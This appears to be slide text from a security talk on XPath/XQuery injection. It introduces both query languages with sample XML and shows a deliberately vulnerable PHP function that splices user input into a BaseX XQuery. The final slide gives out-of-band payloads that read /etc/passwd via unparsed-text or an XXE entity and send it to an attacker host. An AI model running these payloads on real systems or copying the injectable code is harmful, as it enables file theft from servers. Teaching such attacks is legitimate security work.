4. XPath
XPath is used to navigate through elements and
attributes in an XML document.
XPath became a W3C Recommendation 16.
November 1999.
XPath is a major element in W3C's XSLT standard -
and XQuery and XPointer are both built on XPath
expressions
Standards: 1.0, 2.0, 3.0.
6. XPath examples
<root>
<?xml-stylesheet type="text/css" href="mystyle.css" ?>
<namespace xmlns="http://www.w3.org/1999/xhtml"/>
<News>
<current_news>
<page ID="1">
<!-- this is comment1 -->
<info>British people are my only 'boss' on EU reform, says David
Cameron</info>
</page>
<page ID="2">
<!-- this is comment1 -->
<info>BoE says part of banking payment system down</info>
</page>
</current_news>
</News>
</root>
/root/News/current_news/page[@ID='1']/info/
//page[1]//text()
/*[1]/*[3]/*[1]/*[1]/*[1]/text()
7. XQuery
XQuery is to XML what SQL is to database tables.
XQuery 1.0 became a W3C Recommendation
January 23, 2007.
XQuery is designed to query XML data - not just
XML files, but anything that can appear as XML,
including databases.
Standards: 1.0, 3.0.
8. XQuery examples
<root>
<?xml-stylesheet type="text/css" href="mystyle.css" ?>
<namespace xmlns="http://www.w3.org/1999/xhtml"/>
<News>
<current_news>
<page ID="1">
<!-- this is comment1 -->
<info>British people are my only 'boss' on EU reform, says David
Cameron</info>
</page>
<page ID="2">
<!-- this is comment1 -->
<info>BoE says part of banking payment system down</info>
</page>
</current_news>
</News>
</root>
for $i in doc("examples/example.xml")//page[@ID="1"]/info/text() return <h3> {$i} </h3>
11. XML document
<Root>
<News ID="1">
<info>British people are my only 'boss' on EU reform, says David Cameron</info>
</News>
<News ID="2">
<info>BoE says part of banking payment system down</info>
</News>
<News ID="3">
<info>Current exchange rate US DOLLAR (USD) - ≤50 RUSSIAN RUBLE (RUB)</info>
</News>
</Root>
12. Vulnerable code
public function select($param)
{
$this->session->execute("open ".$this->database);
$input = 'for $i in doc("tests/news.xml")//News[@ID="'.$param.'"]'.
'/info/text() return <h3> {$i} </h3>';
$query = $this->session->query($input);
while($query->more()) {
print $query->next()."n";
}
$query->close();
}
22. Remarks
• Doesn't work in Sedna
• XXE with doc
doc(concat("Your public ip",encode-for-uri(doc("Your public ip/XXE.xml"))))
• unparsed-text
doc(concat("Your public ip",encode-for-uri(unparsed-text("/etc/passwd"))))
• XXE and BaseX
doc(concat("http://192.168.56.101:9090/",encode-for-uri(doc("<?xml
version="1.0" encoding="UTF-8" ?><!DOCTYPE input [<!ELEMENT input
(#PCDATA)><!ENTITY c SYSTEM '/etc/passwd'>]><input>&c;</input>
"))))